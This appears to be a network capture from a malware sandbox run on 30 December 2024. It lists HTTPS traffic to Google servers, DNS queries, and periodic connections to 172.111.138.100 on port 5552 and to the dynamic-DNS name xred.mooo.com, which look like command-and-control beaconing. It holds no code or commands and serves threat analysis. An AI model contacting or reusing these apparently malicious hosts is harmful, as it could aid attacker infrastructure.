                                                                                                                      Dec 30, 2024 11:40:59.948180914 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008344889 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008416891 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008436918 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008455038 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008498907 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008498907 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008507967 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008538961 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008553028 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008589029 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.008589983 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.008632898 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.009393930 CET49992443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.009413004 CET44349992142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.010301113 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.010346889 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.011064053 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.011267900 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.011281013 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.460670948 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.460761070 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.462104082 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.462111950 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.462326050 CET50003443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.462331057 CET44350003142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.470429897 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.470510006 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.471267939 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.471354961 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.473751068 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.473781109 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.474117994 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.474203110 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.474710941 CET50001443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.515376091 CET44350001142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.568180084 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.568299055 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.570100069 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.570158958 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.572122097 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.572133064 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.572489977 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.572726965 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.573097944 CET50004443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:00.616168022 CET44350005142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:00.616285086 CET50005443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:00.619333029 CET44350004142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.463330984 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.494177103 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.494357109 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.495024920 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.495353937 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.497323036 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.497328997 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.497616053 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.497704029 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.498114109 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.537058115 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.537605047 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.539335012 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.543960094 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.543972015 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.544358969 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.544364929 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.782797098 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.784003019 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.784142017 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.869379997 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.869499922 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.869529963 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.869570971 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.871364117 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.871414900 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.871459961 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.871479988 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.949712038 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949764967 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949835062 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.949862003 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949886084 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949903011 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.949939013 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.956413031 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956465960 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956537008 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.956547022 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956593990 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956643105 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.182023048 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.182064056 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.183382988 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.183438063 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.183552027 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.184009075 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.184020996 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.191488981 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.191523075 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.194601059 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.194643021 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.194865942 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.195214033 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.195229053 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.198555946 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.198579073 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.199726105 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.199736118 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.199970961 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.200268984 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.200274944 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.200998068 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.201009989 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.201833963 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.201869011 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.201941967 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.202218056 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.202229977 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.783351898 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.783417940 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.783890963 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.783905029 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.784089088 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.784095049 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.802270889 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.802402020 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.806696892 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.806704044 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.807837009 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.807849884 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.811346054 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.812696934 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.815588951 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.815597057 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.815798044 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.815804005 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.816493988 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.816577911 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.816898108 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.816901922 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.817035913 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.817039967 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.149841070 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.149916887 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.149956942 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.150000095 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150055885 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150101900 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.150247097 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.150293112 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150310993 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150968075 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150988102 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.151072979 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.151465893 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.151473045 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.195014954 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.195333004 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.195341110 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.196222067 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.196351051 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.196542025 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.204978943 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.204986095 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.205533981 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.205584049 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.205955029 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.206248999 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.206262112 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222033978 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222079039 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222167015 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222208023 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222208023 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222208023 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222876072 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222898006 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.223396063 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.223427057 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.223480940 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.223685026 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.223697901 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381704092 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381756067 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381763935 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.381776094 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381829023 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.381829023 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.381836891 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381906033 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.382520914 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.382564068 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.382617950 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.382997990 CET50065443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.383019924 CET44350065142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.383065939 CET50065443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.383339882 CET50065443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.383352995 CET44350065142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.750211000 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.746675014 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:15.465820074 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:15.470596075 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:15.470662117 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:15.471081972 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:15.475914001 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.620659113 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.620683908 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621211052 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.621217966 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621406078 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.621434927 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621639013 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.621644974 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.621766090 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.621783018 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.622318983 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.622334003 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.622539997 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.622551918 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.622733116 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.622739077 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.908061028 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.908163071 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909147024 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909163952 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.909179926 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909399033 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.909434080 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.909745932 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.910851955 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.910852909 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:16.955652952 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.955708981 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.955821037 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.955821037 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:16.955822945 CET44350097142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:16.955910921 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:17.108305931 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.108356953 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.108457088 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.108470917 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:17.108541965 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:17.662502050 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:17.662619114 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:17.730338097 CET501395552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:17.735375881 CET555250139172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:23.863301039 CET4975180192.168.2.669.42.215.252
                                                                                                                      Dec 30, 2024 11:41:23.864654064 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:23.865103960 CET50097443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:23.866132021 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:23.866247892 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:24.553148985 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:24.558059931 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:24.558784008 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:24.558784008 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:24.563669920 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:28.919212103 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:28.919562101 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:28.950968027 CET501465552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:28.955732107 CET555250146172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:33.600260019 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:33.605058908 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:33.605797052 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:33.611748934 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:33.616492987 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:35.741250038 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:35.741318941 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:35.777357101 CET501475552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:35.783067942 CET555250147172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:42.693772078 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:42.698546886 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:42.698771954 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:42.699043036 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:42.703829050 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:44.827229977 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:44.830971003 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:45.066664934 CET501505552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:45.071526051 CET555250150172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:51.756201029 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:51.761039019 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:51.761161089 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:51.761478901 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:51.766500950 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:53.892740011 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:53.892951965 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:53.949291945 CET501535552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:53.954077005 CET555250153172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:42:00.806713104 CET501545552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:42:00.811484098 CET555250154172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:42:00.811726093 CET501545552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:42:00.812107086 CET501545552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:42:00.816943884 CET555250154172.111.138.100192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:40:36.279855013 CET | 192.168.2.6 | 1.1.1.1 | 0x55be | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:37.143122911 CET | 192.168.2.6 | 1.1.1.1 | 0xd3e6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:37.162625074 CET | 192.168.2.6 | 1.1.1.1 | 0xdbf1 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:38.138865948 CET | 192.168.2.6 | 1.1.1.1 | 0x8717 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:43.481662989 CET | 192.168.2.6 | 1.1.1.1 | 0x4013 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:50.571055889 CET | 192.168.2.6 | 1.1.1.1 | 0xa45f | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:40:57.413691044 CET | 192.168.2.6 | 1.1.1.1 | 0xc7c | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:41:01.945580006 CET | 192.168.2.6 | 1.1.1.1 | 0xba16 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:41:16.626436949 CET | 192.168.2.6 | 1.1.1.1 | 0xcd76 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:40:36.286524057 CET | 1.1.1.1 | 192.168.2.6 | 0x55be | No error (0) | docs.google.com |  | 142.250.185.78 | A (IP address) | IN (0x0001) | false
